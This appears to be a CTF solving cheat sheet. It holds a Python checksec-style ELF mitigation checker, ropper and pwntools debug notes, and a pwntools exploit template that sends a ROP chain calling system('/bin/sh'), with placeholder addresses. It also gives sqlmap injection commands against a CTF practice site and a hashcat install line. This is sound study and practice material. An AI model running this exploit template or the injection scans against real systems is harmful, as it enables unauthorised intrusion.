CTF-Solve

pwn

# check file type (e.g. 32-bit or 64-bit, static or dynamic, stripped or not)
file binary

# check mitigations (NX, PIE, RELRO, stack canary)
checksec --file=binary
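The two commands above answer two questions before any exploit work starts: the word size, and which mitigations the loader will enforce. The script below is an added example, not code from this repo or from checksec: using only the standard library it reads the same program headers and dynamic tags that checksec inspects and reports NX, PIE, RELRO and canary for both 32-bit and 64-bit ELF files. `build_sample_elf` is a constructed test input (an ELF header, program headers, a tiny PT_DYNAMIC and a fake `.dynstr`, not a loadable program) so the script runs offline; pass a real file as `argv[1]` to inspect it instead. The canary check is a substring heuristic, as in checksec.sh, and is my assumption rather than a parse of the symbol table.

```python
import struct

# ELF constants (System V ABI / glibc elf.h)
ET_DYN = 3
PF_X, PF_R = 0x1, 0x4
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def _program_headers(data):
    """Return (bits, endian, e_type, [(p_type, p_flags, p_offset, p_filesz), ...])."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = 64 if data[4] == 2 else 32        # EI_CLASS
    endian = "<" if data[5] == 1 else ">"    # EI_DATA
    if bits == 64:
        e_type, _, _, _, e_phoff = struct.unpack_from(endian + "HHIQQ", data, 16)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
        fmt, idx = endian + "IIQQQQQQ", (0, 1, 2, 5)    # type, flags, offset, filesz
    else:
        e_type, _, _, _, e_phoff = struct.unpack_from(endian + "HHIII", data, 16)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
        fmt, idx = endian + "IIIIIIII", (0, 6, 1, 4)    # Elf32_Phdr stores p_flags after p_memsz
    phdrs = []
    for i in range(e_phnum):
        fields = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        phdrs.append(tuple(fields[j] for j in idx))
    return bits, endian, e_type, phdrs


def _dynamic_tags(data, bits, endian, phdrs):
    """Map d_tag -> d_val for the PT_DYNAMIC segment, read at its file offset."""
    fmt = endian + ("QQ" if bits == 64 else "II")
    tags = {}
    for p_type, _, off, filesz in phdrs:
        if p_type != PT_DYNAMIC:
            continue
        for pos in range(off, off + filesz, struct.calcsize(fmt)):
            tag, val = struct.unpack_from(fmt, data, pos)
            if tag == DT_NULL:
                break
            tags[tag] = val
    return tags


def checksec(data):
    """Report the mitigations checksec prints, from the headers alone."""
    bits, endian, e_type, phdrs = _program_headers(data)
    tags = _dynamic_tags(data, bits, endian, phdrs)
    stack = [fl for t, fl, _, _ in phdrs if t == PT_GNU_STACK]
    # NX needs a PT_GNU_STACK header without PF_X; with no header at all the
    # kernel defaults to an executable stack, so that counts as NX off.
    nx = bool(stack) and not (stack[0] & PF_X)
    relro_seg = any(t == PT_GNU_RELRO for t, _, _, _ in phdrs)
    bind_now = bool(DT_BIND_NOW in tags or tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                    or tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    return {
        "bits": bits,
        "pie": e_type == ET_DYN,      # the test checksec applies to executables
        "nx": nx,
        "relro": "full" if relro_seg and bind_now else "partial" if relro_seg else "none",
        # heuristic (assumption, like checksec.sh): the canary failure handler is referenced
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf(bits=64, nx=True, pie=True, relro="full", canary=True):
    """Constructed test input (not a loadable program): ELF header,
    program headers, a two-entry PT_DYNAMIC and a fake .dynstr."""
    if bits == 64:
        ehsize, phentsize, hdr_fmt, dyn_fmt = 64, 56, "<4sBBBBB7xHHIQQQIHHHHHH", "<QQ"
    else:
        ehsize, phentsize, hdr_fmt, dyn_fmt = 52, 32, "<4sBBBBB7xHHIIIIIHHHHHH", "<II"
    dynamic = struct.pack(dyn_fmt, DT_FLAGS, DF_BIND_NOW) if relro == "full" else b""
    dynamic += struct.pack(dyn_fmt, DT_NULL, 0)
    dynstr = b"\0__stack_chk_fail\0" if canary else b"\0puts\0"
    segs = [(PT_GNU_STACK, PF_R if nx else PF_R | PF_X, 0, 0)]
    if relro != "none":
        segs.append((PT_GNU_RELRO, PF_R, 0, 0))
    dyn_off = ehsize + (len(segs) + 1) * phentsize   # +1 for PT_DYNAMIC itself
    segs.append((PT_DYNAMIC, PF_R, dyn_off, len(dynamic)))
    header = struct.pack(hdr_fmt, b"\x7fELF", 2 if bits == 64 else 1, 1, 1, 0, 0,
                         ET_DYN if pie else 2, 0x3E if bits == 64 else 0x03, 1,
                         0, ehsize, 0, 0, ehsize, phentsize, len(segs), 0, 0, 0)
    phdrs = b"".join(
        struct.pack("<IIQQQQQQ", t, fl, off, 0, 0, sz, sz, 8) if bits == 64
        else struct.pack("<IIIIIIII", t, off, 0, 0, sz, sz, fl, 4)
        for t, fl, off, sz in segs)
    return header + phdrs + dynamic + dynstr


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    for key, value in checksec(blob).items():
        print(f"{key:>7}: {value}")
```

The RELRO distinction matters for the GOT notes further down: with partial RELRO the GOT stays writable after startup and is an overwrite target; with full RELRO (`PT_GNU_RELRO` plus `DT_BIND_NOW` or the equivalent `DT_FLAGS`/`DT_FLAGS_1` bits) every import is resolved before `main` and the table is mapped read-only.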

ROP tools

# install ropper
pacman -S ropper
pacaur -S python-z3 python-pyvex-git python-archinfo-git # only needed for ropper's semantic gadget search

Q&A

  • If ropper's semantic search reports no gadgets, rerun it with --clear-cache so the gadget cache is rebuilt.

pwntools

debug

# show log (every byte sent and received on the tube)
context.log_level = 'debug'

# gdb: context.terminal is the terminal pwntools opens gdb in; c is the tube returned by process()
# attach before sending the payload so breakpoints are in place when it lands
context.terminal = ['alacritty', '-e', 'sh', '-c']
gdb.attach(c)

GOT

  • find plt/got: objdump -R binfile lists the dynamic relocations, i.e. the address of each GOT slot and the symbol it resolves to
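The debug settings and the GOT lookup above usually end up in the same exploit script. The skeleton below is an added example, not code from this repo: it keeps payload construction in plain-stdlib functions (`pack`, `build_rop`, `gdb_script`) so they can be unit-tested without a target, and imports pwntools only inside `start` and `lookup_got`, which use the real `process`/`remote`/`gdb.attach`/`ELF` API. The binary path, the offset and the gadget addresses in the `__main__` block are placeholders, not values from any real target; the `ELF(...).got` and `.plt` dictionaries give the same table as `objdump -R` and `objdump -d`.

```python
import struct
import sys


def pack(value, bits=64):
    """Stdlib stand-in for pwntools p32/p64: little-endian, masked to word size."""
    return struct.pack("<Q" if bits == 64 else "<I", value & ((1 << bits) - 1))


def build_rop(offset, chain, bits=64, canary=None):
    """Padding up to the saved return address followed by the gadget chain.
    offset is the distance from the buffer start to the return address, or,
    when canary is given, to the canary: [pad][canary][saved rbp/ebp][chain]."""
    word = bits // 8
    payload = b"A" * offset
    if canary is not None:
        payload += pack(canary, bits) + b"B" * word
    return payload + b"".join(pack(g, bits) for g in chain)


def gdb_script(breakpoints, extra=()):
    """gdbscript text for gdb.attach(): ints become address breakpoints,
    strings symbol breakpoints, then any extra commands, then continue."""
    lines = [f"break *{b:#x}" if isinstance(b, int) else f"break {b}" for b in breakpoints]
    lines += list(extra)
    lines.append("continue")
    return "\n".join(lines) + "\n"


def lookup_got(binary):
    """GOT and PLT slot addresses, the table objdump -R shows (pwntools ELF)."""
    from pwn import ELF
    elf = ELF(binary, checksec=False)
    return dict(elf.got), dict(elf.plt)


def start(binary, host=None, port=None, debug=False, gdbscript=""):
    """Local process (under gdb when debug=True) or remote socket."""
    from pwn import context, process, remote, gdb   # lazy: only needed with a target
    context.log_level = "debug" if debug else "info"        # show every byte on the tube
    context.terminal = ["alacritty", "-e", "sh", "-c"]      # terminal that hosts gdb
    if host:
        return remote(host, port)
    io = process(binary)
    if debug:
        gdb.attach(io, gdbscript=gdbscript)   # attach before the payload goes out
    return io


if __name__ == "__main__":
    # Placeholders only (assumptions): BINARY, OFFSET and the gadget addresses
    # must come from file/checksec, ropper and objdump -R on the actual target.
    BINARY, OFFSET = "./a.out", 72
    POP_RDI, BIN_SH, SYSTEM = 0x0, 0x0, 0x0   # fill in from ropper / objdump -R
    args = sys.argv[1:]   # no args: local process under gdb; HOST PORT: remote
    io = start(BINARY, host=args[0] if args else None,
               port=int(args[1]) if len(args) > 1 else None,
               debug=not args, gdbscript=gdb_script(["main"]))
    io.sendline(build_rop(OFFSET, [POP_RDI, BIN_SH, SYSTEM]))
    io.interactive()
```

Run it as `python3 exploit.py` to get a local process with gdb attached and debug logging, or `python3 exploit.py HOST PORT` for the remote service with the same payload.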

Reference

web

  • SSRF

sqlmap

sqlmap -u "https://hackme.inndy.tw/gb/?mod=post" --method POST -p "content,title" --data "title=a&content=b"  # test only the title and content parameters
sqlmap -u "https://hackme.inndy.tw/gb/?mod=post" --method POST -p "content,title" --data "title=a&content=b" --level=3 --risk=3 # if the default scan finds nothing, raise the number and riskiness of payloads tried

XSStrike

other

hashcat install

sudo pacman -S hashcat opencl-mesa # or opencl-nvidia for NVIDIA GPUs